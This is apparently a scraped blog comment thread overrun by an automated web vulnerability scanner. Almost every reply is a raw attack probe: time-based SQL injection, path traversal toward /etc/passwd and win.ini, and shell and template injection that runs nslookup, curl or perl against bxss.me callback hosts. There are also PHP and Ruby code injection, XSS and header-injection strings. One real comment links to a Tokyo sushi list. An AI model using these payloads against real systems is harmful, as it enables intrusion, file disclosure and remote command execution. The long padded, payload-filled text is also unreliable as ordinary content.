.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Wanderlusting
WEB-INF/web.xml
re: Wanderlusting
WEB-INF\web.xml
re: Wanderlusting
1
re: Wanderlusting
1
re: Wanderlusting
-1 OR 2+81-81-1=0+0+0+1 --
re: Wanderlusting
-1 OR 3+81-81-1=0+0+0+1 --
re: Wanderlusting
-1 OR 2+46-46-1=0+0+0+1
re: Wanderlusting
-1 OR 3+46-46-1=0+0+0+1
re: Wanderlusting
-1' OR 2+255-255-1=0+0+0+1 --
re: Wanderlusting
-1' OR 3+255-255-1=0+0+0+1 --
re: Wanderlusting
-1' OR 2+639-639-1=0+0+0+1 or 'dHMWl2PI'='
re: Wanderlusting
-1' OR 3+639-639-1=0+0+0+1 or 'dHMWl2PI'='
re: Wanderlusting
-1" OR 2+77-77-1=0+0+0+1 --
re: Wanderlusting
-1" OR 3+77-77-1=0+0+0+1 --
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
Xsr718Ds'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 614=(SELECT 614 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 355=(SELECT 355 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 150=(SELECT 150 FROM PG_SLEEP(15))--
re: Wanderlusting
JpSvb0tR' OR 257=(SELECT 257 FROM PG_SLEEP(15))--
re: Wanderlusting
Ue7LeNPn') OR 687=(SELECT 687 FROM PG_SLEEP(15))--
re: Wanderlusting
F6VAJkSh')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--
re: Wanderlusting
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@AuEd7
re: Wanderlusting
192NLTF4Q0
re: Wanderlusting
response.write(9516919*9265817)
re: Wanderlusting
'+response.write(9516919*9265817)+'
re: Wanderlusting
"+response.write(9516919*9265817)+"
re: Wanderlusting
<esi:include src="http://bxss.me/rpb.png"/>
re: Wanderlusting
../../../../../../../../../../../../../../etc/passwd
re: Wanderlusting
../../../../../../../../../../../../../../windows/win.ini
re: Wanderlusting
file:///etc/passwd
re: Wanderlusting
${9999024+10000210}
re: Wanderlusting
../
re: Wanderlusting
)
re: Wanderlusting
!(()&&!|*|*|
re: Wanderlusting
^(#$!@#$)(()))******
re: Wanderlusting
redirtest.acx
re: Wanderlusting
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Wanderlusting
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Wanderlusting
echo yqpozi$()\ eyomhw\nz^xyu||a #' &echo yqpozi$()\ eyomhw\nz^xyu||a #|" &echo yqpozi$()\ eyomhw\nz^xyu||a #
re: Wanderlusting
/etc/shells
re: Wanderlusting
&echo pxblit$()\ htsnqh\nz^xyu||a #' &echo pxblit$()\ htsnqh\nz^xyu||a #|" &echo pxblit$()\ htsnqh\nz^xyu||a #
re: Wanderlusting
'.gethostbyname(lc('hitrv'.'voahggjie26e5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(75).chr(99).chr(80).'
re: Wanderlusting
../../../../../../../../../../../../../../etc/shells
re: Wanderlusting
|echo gtejqz$()\ pqhlyi\nz^xyu||a #' |echo gtejqz$()\ pqhlyi\nz^xyu||a #|" |echo gtejqz$()\ pqhlyi\nz^xyu||a #
re: Wanderlusting
".gethostbyname(lc("hitlt"."shkcchdh9f33b.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(78).chr(105).chr(75)."
re: Wanderlusting
c:/windows/win.ini
re: Wanderlusting
expr 9000300014 - 989138
re: Wanderlusting
gethostbyname(lc('hitnm'.'dysxayobb0dbc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(80).chr(121).chr(82)
re: Wanderlusting
bxss.me
re: Wanderlusting
(nslookup -q=cname hitqibslsqrwed34c0.bxss.me||curl hitqibslsqrwed34c0.bxss.me))
re: Wanderlusting
Http://bxss.me/t/fit.txt
re: Wanderlusting
$(nslookup -q=cname hitimzlvvosspe0cae.bxss.me||curl hitimzlvvosspe0cae.bxss.me)
re: Wanderlusting
http://bxss.me/t/fit.txt?.jpg
re: Wanderlusting
&nslookup -q=cname hitmdzgxtzpnz226a0.bxss.me&'\"`0&nslookup -q=cname hitmdzgxtzpnz226a0.bxss.me&`'
re: Wanderlusting
&(nslookup -q=cname hittewlzbgcand33c3.bxss.me||curl hittewlzbgcand33c3.bxss.me)&'\"`0&(nslookup -q=cname hittewlzbgcand33c3.bxss.me||curl hittewlzbgcand33c3.bxss.me)&`'
re: Wanderlusting
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Wanderlusting
|(nslookup -q=cname hitrngmbpgzpj42099.bxss.me||curl hitrngmbpgzpj42099.bxss.me)
re: Wanderlusting
`(nslookup -q=cname hitffrjttqulr2c645.bxss.me||curl hitffrjttqulr2c645.bxss.me)`
re: Wanderlusting
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Wanderlusting
;(nslookup -q=cname hitrsffaluyobf89b4.bxss.me||curl hitrsffaluyobf89b4.bxss.me)|(nslookup -q=cname hitrsffaluyobf89b4.bxss.me||curl hitrsffaluyobf89b4.bxss.me)&(nslookup -q=cname hitrsffaluyobf89b4.bxss.me||curl hitrsffaluyobf89b4.bxss.me)
re: Wanderlusting
';print(md5(31337));$a='
re: Wanderlusting
|(nslookup${IFS}-q${IFS}cname${IFS}hitgpwkpdmgshf960f.bxss.me||curl${IFS}hitgpwkpdmgshf960f.bxss.me)
re: Wanderlusting
";print(md5(31337));$a="
re: Wanderlusting
&(nslookup${IFS}-q${IFS}cname${IFS}hitsvbwkthxalad505.bxss.me||curl${IFS}hitsvbwkthxalad505.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitsvbwkthxalad505.bxss.me||curl${IFS}hitsvbwkthxalad505.bxss.me)&`'
re: Wanderlusting
'"()
re: Wanderlusting
${@print(md5(31337))}
re: Wanderlusting
'&&sleep(27*1000)*ibccez&&'
re: Wanderlusting
${@print(md5(31337))}\
re: Wanderlusting
"&&sleep(27*1000)*hqkpvs&&"
re: Wanderlusting
'.print(md5(31337)).'
re: Wanderlusting
'||sleep(27*1000)*iohnlv||'
re: Wanderlusting
"||sleep(27*1000)*jkptet||"
re: Wanderlusting
HttP://bxss.me/t/xss.html?%00
re: Wanderlusting
bxss.me/t/xss.html?%00
re: Wanderlusting
"+"A".concat(70-3).concat(22*4).concat(98).concat(75).concat(100).concat(81)+(require"socket"
Socket.gethostbyname("hitse"+"avslfpjdc7008.bxss.me.")[3].to_s)+"
re: Wanderlusting
replies
re: Wanderlusting
'+'A'.concat(70-3).concat(22*4).concat(104).concat(76).concat(99).concat(85)+(require'socket'
Socket.gethostbyname('hitic'+'sgnxwaby30b2e.bxss.me.')[3].to_s)+'
re: Wanderlusting
replies�
re: Wanderlusting
'A'.concat(70-3).concat(22*4).concat(118).concat(79).concat(97).concat(67)+(require'socket'
Socket.gethostbyname('hitsd'+'hubopahs66a74.bxss.me.')[3].to_s)
re: Wanderlusting
replies/.
re: Wanderlusting
'"
re: Wanderlusting
<!--
re: Wanderlusting
'"()&%<zzz><ScRiPt >8O1c(9900)</ScRiPt>
re: Wanderlusting
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitoormjensgi60e9a.bxss.me")}}
re: Wanderlusting
'"()&%<zzz><ScRiPt >8O1c(9217)</ScRiPt>
re: Wanderlusting
9367289
re: Wanderlusting
gqMbXWL8
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
*1
re: Wanderlusting
-1 OR 5*5=25 --
re: Wanderlusting
-1 OR 5*5=26 --
re: Wanderlusting
-1 OR 5*5=25
re: Wanderlusting
-1 OR 5*5=26
re: Wanderlusting
*if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
-1 waitfor delay '0:0:15' --
re: Wanderlusting
3wlvMZtB'; waitfor delay '0:0:15' --
re: Wanderlusting
-1 OR 858=(SELECT 858 FROM PG_SLEEP(15))--
re: Wanderlusting
-1) OR 582=(SELECT 582 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 182=(SELECT 182 FROM PG_SLEEP(15))--
re: Wanderlusting
S3yV4BxT' OR 615=(SELECT 615 FROM PG_SLEEP(15))--
re: Wanderlusting
db0XyZ6v') OR 344=(SELECT 344 FROM PG_SLEEP(15))--
re: Wanderlusting
GbAnvGgo')) OR 107=(SELECT 107 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
'"
re: Wanderlusting
@@bvqqB
re: Wanderlusting
(select 198766*667891)
re: Wanderlusting
(select 198766*667891 from DUAL)
A new list (not by the same author) was posted recently https://www.luxeat.com/blog/9-easy-to-book-sushi-yas-in-tokyo-by-nigiri-paris/
re: magiquonnu
1BhveAPE6zO
re: magiquonnu
<esi:include src="http://bxss.me/rpb.png"/>
re: magiquonnu
%0abcc:074625.67-22079.67.8182b.19990.2@bxss.me
re: magiquonnu
${9999373+9999089}
re: magiquonnu
response.write(9885492*9627640)
re: magiquonnu
to@example.com>%0d%0abcc:074625.67-22080.67.8182b.19990.2@bxss.me
re: magiquonnu
'+response.write(9885492*9627640)+'
re: magiquonnu
"+response.write(9885492*9627640)+"
re: magiquonnu
../../../../../../../../../../../../../../etc/passwd
re: magiquonnu
../../../../../../../../../../../../../../windows/win.ini
re: magiquonnu
file:///etc/passwd
re: magiquonnu
)
re: magiquonnu
'.gethostbyname(lc('hitcf'.'tcjqwvace654c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(73).chr(102).chr(65).'
re: magiquonnu
../../../../../../../../../../../../../../../proc/version
re: magiquonnu
!(()&&!|*|*|
re: magiquonnu
".gethostbyname(lc("hittz"."pmhvshih2f11b.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(89).chr(108).chr(70)."
re: magiquonnu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: magiquonnu
^(#$!@#$)(()))******
re: magiquonnu
../../../../../../../../../../etc/passwd%00.jpg
re: magiquonnu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: magiquonnu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: magiquonnu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: magiquonnu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: magiquonnu
HttP://bxss.me/t/xss.html?%00
re: magiquonnu
"+"A".concat(70-3).concat(22*4).concat(111).concat(66).concat(108).concat(79)+(require"socket"
Socket.gethostbyname("hitpg"+"ttzgxpqb34d16.bxss.me.")[3].to_s)+"
re: magiquonnu
/etc/passwd
re: magiquonnu
bxss.me/t/xss.html?%00
re: magiquonnu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: magiquonnu
'+'A'.concat(70-3).concat(22*4).concat(103).concat(72).concat(119).concat(73)+(require'socket'
Socket.gethostbyname('hitij'+'ksxfyxaw5f68d.bxss.me.')[3].to_s)+'
re: magiquonnu
echo wyisnq$()\ fbnxmp\nz^xyu||a #' &echo wyisnq$()\ fbnxmp\nz^xyu||a #|" &echo wyisnq$()\ fbnxmp\nz^xyu||a #
re: magiquonnu
%2fetc%2fpasswd
re: magiquonnu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: magiquonnu
&echo sasbww$()\ efaclr\nz^xyu||a #' &echo sasbww$()\ efaclr\nz^xyu||a #|" &echo sasbww$()\ efaclr\nz^xyu||a #
re: magiquonnu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: magiquonnu
Http://bxss.me/t/fit.txt
re: magiquonnu
|echo qjjfoc$()\ izhxet\nz^xyu||a #' |echo qjjfoc$()\ izhxet\nz^xyu||a #|" |echo qjjfoc$()\ izhxet\nz^xyu||a #
re: magiquonnu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: magiquonnu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: magiquonnu
http://bxss.me/t/fit.txt%3F.jpg
re: magiquonnu
'"
re: magiquonnu
(nslookup hitwcwhwqqzzz4a6de.bxss.me||perl -e "gethostbyname('hitwcwhwqqzzz4a6de.bxss.me')")
re: magiquonnu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: magiquonnu
';print(md5(31337));$a='
re: magiquonnu
/etc/shells
re: magiquonnu
<!--
re: magiquonnu
$(nslookup hitagpuqpxbkl625da.bxss.me||perl -e "gethostbyname('hitagpuqpxbkl625da.bxss.me')")
re: magiquonnu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: magiquonnu
";print(md5(31337));$a="
re: magiquonnu
c:/windows/win.ini
re: magiquonnu
&nslookup hitmdickeqzsfd6e17.bxss.me&'\"`0&nslookup hitmdickeqzsfd6e17.bxss.me&`'
re: magiquonnu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: magiquonnu
${@print(md5(31337))}
re: magiquonnu
bxss.me
re: magiquonnu
&(nslookup hitavbsvavksaaa024.bxss.me||perl -e "gethostbyname('hitavbsvavksaaa024.bxss.me')")&'\"`0&(nslookup hitavbsvavksaaa024.bxss.me||perl -e "gethostbyname('hitavbsvavksaaa024.bxss.me')")&`'
re: magiquonnu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: magiquonnu
${@print(md5(31337))}\
re: magiquonnu
|(nslookup hithekzhzgkzm50ead.bxss.me||perl -e "gethostbyname('hithekzhzgkzm50ead.bxss.me')")
re: magiquonnu
file:///etc/passwd
re: magiquonnu
'.print(md5(31337)).'
re: magiquonnu
`(nslookup hitcptvrsdoulbbaff.bxss.me||perl -e "gethostbyname('hitcptvrsdoulbbaff.bxss.me')")`
re: magiquonnu
/\../\../\../\../\../\../\../etc/passwd
re: magiquonnu
;(nslookup hitoplruogtsgfc035.bxss.me||perl -e "gethostbyname('hitoplruogtsgfc035.bxss.me')")|(nslookup hitoplruogtsgfc035.bxss.me||perl -e "gethostbyname('hitoplruogtsgfc035.bxss.me')")&(nslookup hitoplruogtsgfc035.bxss.me||perl -e "gethostbyname('hitoplruogtsgfc035.bxss.me')")
re: magiquonnu
/WEB-INF/web.xml
re: magiquonnu
C:\WINDOWS\system32\drivers\etc\hosts
re: magiquonnu
../../../../../../../../../../windows/win.ini%00.jpg
re: magiquonnu
/../../../../../../../../../../boot.ini
re: magiquonnu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: magiquonnu
..\..\..\..\..\..\..\..\windows\win.ini
re: magiquonnu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: magiquonnu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: magiquonnu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: magiquonnu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: magiquonnu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\